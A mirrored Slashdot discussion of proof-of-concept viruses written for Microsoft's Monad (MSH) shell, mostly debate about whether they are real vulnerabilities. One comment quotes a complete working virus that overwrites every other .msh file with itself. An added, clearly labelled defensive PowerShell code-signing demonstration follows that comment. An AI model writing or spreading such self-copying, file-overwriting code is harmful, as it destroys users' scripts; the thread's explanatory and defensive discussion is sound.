Slashdot Mirror


Windows Vista Tool Targeted By Virus Writers

An anonymous reader writes "Five proof-of-concept viruses that target Monad, the next version of Vista's command prompt, have been published on the web. Monad is a command line interface and scripting language that is similar to Unix shells such as bash, but is based on object-oriented programming and the .Net framework. The viruses' only action is to infect other shell scripts on the host's operating system. They would cause little harm in the wild, but would be relatively easy to modify using the information from the article, said Mikko Hyppönen, the director of antivirus research at F-Secure."

31 of 293 comments

  1. Short on Details by Anonymous Coward · · Score: 3, Interesting
    There are always virus writers who want to be the first to write a virus for a new platform.
    I don't see what a big deal being the first person to write a virus for Vista is. Oh, first post!

    But seriously, this article is very light on the details. I assume that these virus writers found a way to gain administrative rights using Monad, but the article makes it sound like these are just malicious scripts. It might as well be an advanced batch script that can spread itself, then del /s /q.
    1. Re:Short on Details by Leeji · · Score: 5, Informative

      You got it right when you said "it might as well be a batch script." These are just Monad scripts running on the system, just like batch files, perl scripts, Cygwin bash scripts, Ruby scripts, etc.

      There is nothing intrinsic in Monad that enables these attacks, aside from it being a new language. In fact, Monad implements several features that help mitigate the dangers of traditional script viruses, as I outline here.

      --
      It all goes downhill from first post ...
    2. Re:Short on Details by Owndapan · · Score: 4, Informative
      I believe Monad/MSH is no longer even a part of the Longhorn release, so it is a bit unfair to have everyone jump on it as a Windows Vista exploit. From Wikipedia:
      MSH was originally slated to be shipped with Windows Vista, but has since assumed its own release schedule. Microsoft sources have confirmed MSH's first public release will most likely precede the release of Vista and be part of the next edition of Microsoft Exchange, due in the second half of 2006.
    3. Re:Short on Details by Coryoth · · Score: 5, Interesting

      You got it right when you said "it might as well be a batch script." These are just Monad scripts running on the system, just like batch files, perl scripts, Cygwin bash scripts, Ruby scripts, etc.

      Yes but you must remember that F-Secure are a bunch of alarmist gits who will jump at any opportunity to seed panic with regard to threats of viruses, hackers, "cyberterrorists" (if such a thing even exists), and whatever else they can dream up. Read through a decent sampling of their past press releases and you'll get the idea.

      Certainly there are potential issues, but I don't think there's really anything to panic about yet.

      Jedidiah.

    4. Re:Short on Details by Negatif · · Score: 3, Informative

      Nope, FRISK Software makes F-Prot. Not sure if you're trolling or just being misinformed.

  2. What? Say it isn't so! by CypherXero · · Score: 3, Funny

    Microsoft Windows is insecure! More details later, movie at 10.

    1. Re:What? Say it isn't so! by patio11 · · Score: 5, Insightful

      This just in! Running arbitrary code from an untrusted source not a security best-practice!

  3. Comments from a Monad developer by Leeji · · Score: 5, Interesting

    The fact that MSH is used as the execution vehicle is really a side-note, as it does not exploit any vulnerabilities in Monad. The guidance on shell script viruses is the same as the guidance on all viruses and malware: protect yourself against the point of entry, and limit the amount of damage that the malicious code can do.

    That's not to belittle the dangers of script viruses, though.

    I wrote a blog entry about it here, in relation to Monad.

    --
    It all goes downhill from first post ...
    1. Re:Comments from a Monad developer by stratjakt · · Score: 5, Insightful

      They've stated that they don't care if legacy apps break, and they proved it (somewhat) with XP SP2, and an anti-spyware tool which kicks the crap out of a lot of old code.

      I'm sure I'm not the only developer out there who's had to rewrite some stuff to keep XP happy. And, despite the extra work, I see it as a good thing.

      --
      I don't need no instructions to know how to rock!!!!
    2. Re:Comments from a Monad developer by jest3r · · Score: 4, Funny

      Believe it or not but "Monad" wasn't their first choice. Other names which were seriously considered include: Mesticle, Menis, Magina and Mitoris ...

    3. Re:Comments from a Monad developer by Osty · · Score: 4, Informative

      The real question is why the heck they decided to call it "Monad"?!

      The short answer: It's a codename. It won't ship with that name. Most likely it'll go with the less interesting "Microsoft Shell" or "msh".

      The long answer: Monad and Monads in functional programming (long answer has been diverted to Wikipedia, because I'm lazy).

      The non-answer: Get your mind out of the gutter, you pervert. Not everything ending in "-nad" refers to genitalia.

    4. Re:Comments from a Monad developer by starling · · Score: 5, Funny

      Yabbut if they'd chosen one of those other names the GNU version wouldn't end up being called Gonad.

      Sneaky, huh?

    5. Re:Comments from a Monad developer by kfg · · Score: 3, Funny

      Missing option:

      Moobs.

      KFG

    6. Re:Comments from a Monad developer by shmlco · · Score: 4, Interesting
      I don't see why they can't lock it down firewall-style. When XYZ application runs and tries to hit a reserved directory or section of the registry, popup a window saying so and ask if you want to allow it.

      You might not even need the popup. My firewall on a couple of machines has a database it can go out to search and see if this application is "known" and should have access.

      It might be less secure than a total limited-account-lockdown, but it would be better than nothing. In fact, I think the latest version of ZoneAlarm already has this sort of "inner firewall".

      --
      Any sect, cult, or religion will legislate its creed into law if it acquires the political power to do so.
    7. Re:Comments from a Monad developer by Oscar_Wilde · · Score: 3, Insightful

      The guidance on shell script viruses is the same as the guidance on all viruses and malware: protect yourself against the point of entry, and limit the amount of damage that the malicious code can do.
       
      For those of you who still don't get it: stop logging in as an administrator you idiots.

    8. Re:Comments from a Monad developer by NickFortune · · Score: 4, Funny
      Yabbut if they'd chosen one of those other names the GNU version wouldn't end up being called Gonad.

      Looking at the syntax, I think the GPL version is called Perl 6

      --
      Don't let THEM immanentize the Eschaton!
    9. Re:Comments from a Monad developer by Anonymous Coward · · Score: 3, Funny

      because people are retards and would click "no don't allow access" then proceed to whinge to tech support that their internet is broken, nothing works, blah blah...

      OTOH, people are retards and would click "yes do allow access" then proceed to whinge to tech support that their computer is broken, nothing works, blah blah

  4. Re:What's the motivation by Anonymous Coward · · Score: 3, Funny

    So l337 h4x0rz c4n pwn j00!!!!

  5. Nothing serious i must say by Anonymous Coward · · Score: 4, Interesting

    Something which requires you to execute a script on the computer is not a virus. Think: if you execute a bash script in Linux and it goes on and puts itself in all your bash scripts, would you call it a virus?

    This is actually nothing; it simply prepends/appends or puts itself in the middle of existing MSH scripts. It is equivalent to running a binary on your machine that attaches itself to all the binaries on your machine.

    On top of that, MSH by default only lets digitally signed scripts execute, hence once infected, scripts won't execute. This is not really a threat at all.

  6. How is this different from *NIX shell scripts? by MagikSlinger · · Score: 5, Insightful

    How is this different than writing a ksh or bash script virus? Ksh and bash script viruses can be just as bad. Heck, remember the Morris worm?

    I like bashing M$ just as much as the next ./er, but this might not be their bad just yet.

    --
    The bitter lessons of a veteran coder: http://bitterprogrammer.blogspot.com
  7. Re:Oopsie! by jmking1 · · Score: 4, Interesting
    That's exactly the reasoning people used in support of Firefox before 1.0 was released. I don't see why it can't be used for any beta software.

    Oh, and just for completeness, vulnerabilities have been found in Firefox since 1.0, so the argument that only Microsoft releases "beta" (read: vulnerable/insecure) code as production-level software doesn't work either.

  8. So what? by IchBinEinPenguin · · Score: 4, Insightful

    All this proves is that Monad can find and modify text files (and that there are idiots out there who will misuse tools).
    About the only way around this is code-signing to prevent modification (yeah, like I'm gonna sign every single perl script I ever wrote.....)

    It's not like you can't do this in bash, awk, sed, perl, python, REXX etc. etc.

  9. full circle wtf ? by bxbaser · · Score: 3, Funny

    I must be getting old when i see the full circles everywhere.

    When Windows 95 came out the Windows zealots were so quick to point out "no more having to type in DOS, Windows is better than everything"; now they will say "we have a shell, Windows is better than everything".

  10. Re:Not a vulnerability by dedazo · · Score: 4, Insightful
    Slashdot has a history of reporting user-executed attachments as "vulnerabilities", to the never ending delight of the peanut gallery, who consider that it's Microsoft's fault if I run something I shouldn't have on my computer, but if I do the same thing on any other OS, it's my fault.

    Plus, Hakko Mipponen (or whatever his name is) has to make a living scaring the bejezus out of everyone - what better way to get started than with something that's not even really out of alpha?

    --
    Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
  11. Leibnitz is rolling in his grave by calculadoru · · Score: 3, Interesting

    Quoth the wise man in his treatise Monadology (1714):
    "There is also no way of explaining how a monad can be altered or changed in its inner being by any other created thing, since there is no possibility of transposition within it, nor can we conceive of any internal movement which can be produced, directed, increased or diminished within it, such as can take place in the case of compounds where a change can occur among the parts. The monads have no windows through which anything may come in or go out. The Attributes cannot detach themselves or go forth from the substances, as could sensible species of the Schoolmen. In the same way neither substance nor attribute can enter from without into a monad."

    And they've managed to attack them??? Oh, the humanity...

    --
    The power of accurate observation is commonly called cynicism by those who have not got it. -- G.B. Shaw
  12. More Windows viruses? by Lisandro · · Score: 4, Funny

    Awwww, crap guys. Let it go already. It's a bit like kicking a cripple at this point.

  13. Re:What's the motivation by dedazo · · Score: 4, Interesting
    Maybe it's because they pound their chests and declare they're the most secure, cheapest, bestest, fastest, etc, etc, even when there's overwhelming evidence to the contrary.

    Yeah, it sucks when that happens.

    Of course you can always "embargo" all your vulnerability details (see for example bug #294795) - and feel comfortable in your superior position!

    --
    Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
  14. An Example of One of the So-Called Viruses by AdamBa · · Score: 4, Informative
    This is the verbatim text of one of the five viruses:

    # Pass 1: locate the virus's own file by its size in bytes (249 here);
    # $name is a FileInfo object, so .Length is the file size.
    $name_array = get-childitem *.msh
    foreach ($name in $name_array)
    {
        if ($name.Length -eq 249)
        {
            $my_file = $name.Name
        }
    }

    # Pass 2: overwrite every other .msh file in the directory with that file.
    foreach ($victim in $name_array)
    {
        if ($victim.Length -ne 249)
        {
            copy-item $my_file $victim.Name
        }
    }

    All it does is find every .msh file and replace its contents with itself. That's it. You could do it with a .CMD file in any version of Windows (and of course in any other scripting language).

    The other scripts get a bit more complicated (insert at a random spot in the file, etc) but that's basically it. There's no new vulnerability exposed by Monad.

    - adam
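
The code-signing mitigation raised in comments 5 and 8 above, as an added example that is not code from the article, from the thread or from the Monad team. It is written in the PowerShell that Monad/MSH eventually shipped as, and assumes Windows PowerShell 5.1 or PowerShell 7 on Windows (New-SelfSignedCertificate is a Windows-only cmdlet). The directory, script names and certificate subject are made up for the demo; the two tamperings reproduce what the sample above does (overwrite) and what the other variants do (insert), without running any of the viruses.

```powershell
# Added example, not from the thread: sign a directory of scripts, tamper with
# two of them the way the sample viruses do, then verify and enforce.
# Assumes Windows PowerShell 5.1 or PowerShell 7 on Windows.
# Paths, script names and the certificate subject are hypothetical.
$ErrorActionPreference = 'Stop'
$scriptDir = Join-Path $env:TEMP 'signed-scripts-demo'
New-Item -ItemType Directory -Path $scriptDir -Force | Out-Null

# 1. A throwaway code-signing certificate in the current user's store. In
#    production use one issued by your internal CA and publish it to Trusted
#    Publishers on every host. A self-signed cert that is not trusted makes even
#    untouched files report UnknownError, which is still "not Valid" and is
#    still refused under AllSigned, so the check below tests for Status -ne Valid.
$cert = New-SelfSignedCertificate -Subject 'CN=Demo Script Signer (hypothetical)' `
    -Type CodeSigningCert -CertStoreLocation 'Cert:\CurrentUser\My'

# 2. Two ordinary scripts standing in for the .msh files in the thread.
$a = Join-Path $scriptDir 'a.ps1'
$b = Join-Path $scriptDir 'b.ps1'
'Write-Output "hello from a.ps1"' | Set-Content -Path $a
'Write-Output "hello from b.ps1"' | Set-Content -Path $b

# 3. Sign every script. Set-AuthenticodeSignature appends a "# SIG # Begin
#    signature block" trailer whose signed hash covers everything before it.
Get-ChildItem -Path $scriptDir -Filter *.ps1 | ForEach-Object {
    Set-AuthenticodeSignature -FilePath $_.FullName -Certificate $cert | Out-Null
}

# 4. Simulate the two infection styles without running any virus: prepend a
#    line to a.ps1 (the "insert itself" variant) and overwrite b.ps1 with
#    unsigned content (the copy-item variant, where the source is the
#    attacker's own unsigned file). Both payloads are constructed and harmless.
Set-Content -Path $a -Value (@('# line prepended by a script virus (constructed, harmless)') + (Get-Content -Path $a))
'Write-Output "unsigned replacement (constructed)"' | Set-Content -Path $b

# 5. The check: the same verification AllSigned performs before running a
#    script, packaged so a periodic sweep over a script share can run it.
function Test-ScriptSignatures {
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -Path $Path -Filter *.ps1 | ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        [pscustomobject]@{
            Script = $_.Name
            Status = $sig.Status   # Valid, HashMismatch, NotSigned, UnknownError, ...
            Signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
        }
    }
}
$report = Test-ScriptSignatures -Path $scriptDir
$report | Format-Table -AutoSize
$tampered = $report | Where-Object Status -ne 'Valid'
Write-Output "Scripts failing the signature check: $($tampered.Script -join ', ')"

# 6. Enforcement: under AllSigned the shell refuses every script whose status
#    is not Valid. Process scope keeps the demo from touching the machine policy.
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope Process -Force
foreach ($script in $a, $b) {
    try   { & $script }
    catch { Write-Warning "$(Split-Path -Leaf $script) refused: $($_.Exception.Message)" }
}

# Remove the demo certificate from the user store.
Remove-Item -Path $cert.PSPath -Force
```

Two caveats a practitioner should keep in mind. First, the signature covers the file's content, not its name, so a script virus that copies an already signed and trusted script byte-for-byte over another one leaves a signature that still verifies; signing stops unsigned or modified code from running, which is the case for every sample in the article, but it is not an integrity baseline for "which content belongs in which file". Second, the execution policy is a per-scope setting that any local administrator can flip (and, as comment 7 above points out, most people at the time ran as one); Microsoft itself documents it as a guard against unintentional execution rather than a security boundary, so it complements, and does not replace, running scripts under a limited account.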

  15. The Monad by payndz · · Score: 3, Funny
    In the comic series The ABC Warriors (specifically the story 'Black Hole'), the Monad was a bloated, ruthless manifestation of all human evil that attempted to destroy the Earth by corrupting and overloading the incredible technological achievement that linked humanity together.

    But I'm sure that's just a coincidence.

    --
    You must think in Russian.
  16. i dont see why this is news.... by Madd+Scientist · · Score: 4, Informative
    1) it's a scripting language
    2) assume you already have command line access

    a "virus" at this point is trivial... just append the code to append itself at the end of every file it assumes is a script for this command line.

    this is like batch file viruses that format the drive... it isn't anything special, it's just a matter of getting the mark to run the file. nothing to see here.

  17. Too many Moving Parts by ajs318 · · Score: 3, Insightful
    Why the hell does a command line interface need to incorporate Object Oriented features? This sounds to me like adding features for features' sake.

    The more sophisticated you make a system, the more failure modes you introduce -- and the harder it gets to test the edge cases, because there end up being too many edges. You want Object Oriented? I'll give you an Object Oriented example. Let's have a "length" type with properties which correspond to its conversion into different measuring units.
    var height IsOfType length
    reset height
    let height = 1.75
    print height.feet # prints 5
    print height.feet.inches # prints 8.8975
    print height.inches # prints 68.8975
    reset height
    let height.inches = 72
    print height.feet # prints 6
    print height # prints 1.8288
    forget height
    It may well be pretty, but outside of any programme dealing with units conversion it's fairly unnecessary. And it contains many programming hazards which would thwart the careless implementor. {BTW, that was a fictitious example; but I'm willing to bet there is at least one programming language out there that actually implements something like it.}

    All a command shell really has to do is be able to launch programmes, police the I/O traffic and keep hold of some state information. If it can do all that right, any other functionality you need can be provided by external programmes. That way, everything is kept as simple as it needs to be; you haven't got code cluttering up things that don't need it. If you do build functionality into the shell, there should be a bloody good reason -- usually that reason is that some external programme is getting launched more than its fair share. And in that case you already have the code you need to incorporate and it's been thoroughly tested.
    --
    Je fume. Tu fumes. Nous fûmes!